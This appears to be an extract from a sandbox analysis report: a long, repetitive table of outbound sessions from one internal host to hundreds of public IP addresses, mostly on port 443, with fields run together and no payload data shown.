                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11058192.168.2.145735620.210.101.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11059192.168.2.1447394134.164.33.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11060192.168.2.1438934160.53.80.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11061192.168.2.1451924148.4.69.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11062192.168.2.1454804185.148.110.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11063192.168.2.145331464.164.68.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11064192.168.2.145307270.253.217.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11065192.168.2.1433948219.89.49.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11066192.168.2.144642447.19.206.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11067192.168.2.1435424212.144.23.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11068192.168.2.145114092.173.216.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11069192.168.2.14423909.244.186.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11070192.168.2.1432910119.147.1.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11071192.168.2.1434642183.2.118.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11072192.168.2.1439184134.195.148.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11073192.168.2.1438792142.150.232.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11074192.168.2.144736693.93.163.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11075192.168.2.145042497.83.94.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11076192.168.2.1440010135.61.238.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11077192.168.2.144072286.52.54.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11078192.168.2.144711494.37.226.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11079192.168.2.144589853.170.200.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11080192.168.2.1444026120.65.222.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11081192.168.2.1434760131.130.81.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11082192.168.2.1451158143.197.112.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11083192.168.2.145813065.178.98.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11084192.168.2.1450468180.245.91.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11085192.168.2.14549268.186.202.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11086192.168.2.1441756196.163.224.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11087192.168.2.144598813.144.133.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11088192.168.2.145302671.71.134.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11089192.168.2.1454036196.164.16.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11090192.168.2.1458562188.159.223.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11091192.168.2.145946425.12.23.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11092192.168.2.143701680.63.251.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11093192.168.2.1459474153.83.253.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11094192.168.2.1447712141.232.220.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11095192.168.2.1453344193.176.198.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11096192.168.2.1453336147.34.52.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11097192.168.2.1452564223.126.108.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11098192.168.2.143845861.120.232.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11099192.168.2.143479674.151.13.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11100192.168.2.1458588106.107.89.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11101192.168.2.1433854172.53.83.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11102192.168.2.1443564171.204.204.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11103192.168.2.1447182120.36.7.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11104192.168.2.143405224.122.222.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11105192.168.2.144509837.240.218.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11106192.168.2.144152457.236.126.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11107192.168.2.1446158213.235.34.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11108192.168.2.1446074181.202.22.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11109192.168.2.144364078.153.232.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11110192.168.2.1451944156.60.62.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11111192.168.2.143519041.189.118.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11112192.168.2.1436838101.107.244.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11113192.168.2.1451892128.26.116.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11114192.168.2.145236076.127.6.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11115192.168.2.1459402185.34.59.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11116192.168.2.145512637.111.206.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11117192.168.2.144547487.209.207.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11118192.168.2.144305278.147.92.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11119192.168.2.1451046139.203.151.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11120192.168.2.1441706179.53.141.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11121192.168.2.1436238219.77.122.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11122192.168.2.1450656106.141.245.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11123192.168.2.144944678.70.78.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11124192.168.2.1455238187.177.200.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11125192.168.2.145602620.255.65.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11126192.168.2.1451246129.174.14.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11127192.168.2.1440602197.17.112.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11128192.168.2.143892212.205.90.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11129192.168.2.1452972192.74.135.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11130192.168.2.144369243.207.151.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11131192.168.2.1439912182.92.6.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11132192.168.2.1457788168.23.59.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11133192.168.2.144998270.196.119.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11134192.168.2.145503273.118.66.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11135192.168.2.144559084.230.20.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11136192.168.2.1452400219.185.126.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11137192.168.2.1444608120.31.75.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11138192.168.2.143633092.30.55.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11139192.168.2.145892847.22.192.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11140192.168.2.145563861.192.15.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11141192.168.2.1441608113.144.174.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11142192.168.2.1443834133.145.122.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11143192.168.2.1450410170.161.158.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11144192.168.2.144252660.35.65.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11145192.168.2.1438568165.132.152.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11146192.168.2.1442202136.14.198.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11147192.168.2.1439524146.18.252.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11148192.168.2.14518982.25.125.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11149192.168.2.145652637.5.178.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11150192.168.2.1439754211.160.11.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11151192.168.2.1454056191.69.128.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11152192.168.2.144311019.77.43.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11153192.168.2.1458442198.72.197.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11154192.168.2.1446022118.78.230.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11155192.168.2.1452078196.95.59.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11156192.168.2.1434452128.46.71.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11157192.168.2.143974072.27.194.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11158192.168.2.14576789.206.93.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11159192.168.2.1441346119.184.63.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11160192.168.2.1437660153.213.181.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11161192.168.2.144027427.229.222.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11162192.168.2.145573031.22.140.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11163192.168.2.1451556219.4.92.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11164192.168.2.1459604126.195.85.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11165192.168.2.1449758211.171.215.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11166192.168.2.1441458189.244.109.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11167192.168.2.1457606222.65.207.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11168192.168.2.1438190128.227.12.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11169192.168.2.1454558200.68.143.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11170192.168.2.144132254.4.148.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11171192.168.2.1435462157.140.69.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11172192.168.2.1444022102.213.133.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11173192.168.2.145654049.5.137.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11174192.168.2.143648025.118.134.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11175192.168.2.144549053.175.97.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11176192.168.2.1443856171.171.96.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11177192.168.2.14443684.101.45.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11178192.168.2.1460562177.235.69.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11179192.168.2.145351495.200.9.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11180192.168.2.1443206103.225.157.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11181192.168.2.1436610207.92.144.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11182192.168.2.143878041.68.76.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11183192.168.2.1433286143.9.243.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11184192.168.2.1436854154.213.159.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11185192.168.2.144618646.238.78.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11186192.168.2.145421669.160.226.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11187192.168.2.143641832.147.181.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11188192.168.2.145256035.198.130.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11189192.168.2.145239447.118.86.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11190192.168.2.1446378172.65.127.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11191192.168.2.145200646.65.127.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192192.168.2.1432826204.168.186.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11193192.168.2.1455258161.29.126.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11194192.168.2.144428666.116.203.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11195192.168.2.1452898120.66.132.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11196192.168.2.1452984202.163.136.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11197192.168.2.144484265.194.25.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11198192.168.2.1441618147.217.165.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11199192.168.2.143503690.245.208.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11200192.168.2.1432952151.27.118.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11201192.168.2.1433486125.26.106.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11202192.168.2.1446970213.89.91.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11203192.168.2.1442068203.105.4.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11204192.168.2.145770013.134.242.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11205192.168.2.1458330218.67.61.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11206192.168.2.1435662160.234.191.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11207192.168.2.145740817.17.14.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11208192.168.2.1435684134.189.106.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11209192.168.2.144759482.193.169.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11210192.168.2.1447436130.43.156.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11211192.168.2.145873879.97.230.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11212192.168.2.1446698163.47.170.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11213192.168.2.144493496.22.121.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11214192.168.2.1448568185.118.223.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11215192.168.2.1458992130.109.145.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11216192.168.2.145486231.126.247.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11217192.168.2.144734643.199.105.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11218192.168.2.1457422117.150.216.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11219192.168.2.144718870.140.196.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11220192.168.2.143470250.80.58.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11221192.168.2.144245685.164.90.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11222192.168.2.1458678104.139.136.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11223192.168.2.1454554193.244.245.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11224192.168.2.143996024.126.76.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11225192.168.2.1446920211.106.72.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11226192.168.2.145775091.180.20.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11227192.168.2.1444872220.209.72.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11228192.168.2.1446098194.49.125.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11229192.168.2.1435290144.170.186.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11230192.168.2.144659864.223.130.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11231192.168.2.143508497.53.27.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11232192.168.2.14443709.175.181.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11233192.168.2.145290224.178.125.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11234192.168.2.1459610158.21.224.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11235192.168.2.14366125.170.93.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11236192.168.2.145783657.97.35.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11237192.168.2.1450478159.192.58.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11238192.168.2.1434040164.233.221.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11239192.168.2.1453772170.192.234.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11240192.168.2.146001650.101.5.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11241192.168.2.145988661.65.62.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11242192.168.2.1436536137.241.238.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11243192.168.2.1458382188.51.11.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11244192.168.2.1460466216.113.21.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11245192.168.2.1455674107.63.181.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11246192.168.2.1437738191.59.242.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11247192.168.2.1452348162.194.1.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11248192.168.2.1446162157.154.165.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11249192.168.2.1440704219.178.249.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11250192.168.2.1448624172.173.100.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11251192.168.2.1442132211.110.54.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11252192.168.2.1437462139.7.243.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11253192.168.2.144452894.175.231.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11254192.168.2.1453248222.117.76.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11255192.168.2.145996089.110.109.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11256192.168.2.144892019.210.70.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11257192.168.2.144984075.69.80.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11258192.168.2.1456142176.254.48.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11259192.168.2.1455490171.92.188.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11260192.168.2.144235819.251.96.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11261192.168.2.144700219.47.161.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11262192.168.2.144694886.31.127.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11263192.168.2.1456162133.205.193.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11264192.168.2.1449430174.78.248.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11265192.168.2.145626893.179.105.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11266192.168.2.1439640137.187.228.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11267192.168.2.1433762149.159.136.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11268192.168.2.144578480.95.239.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11269192.168.2.145240853.28.0.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
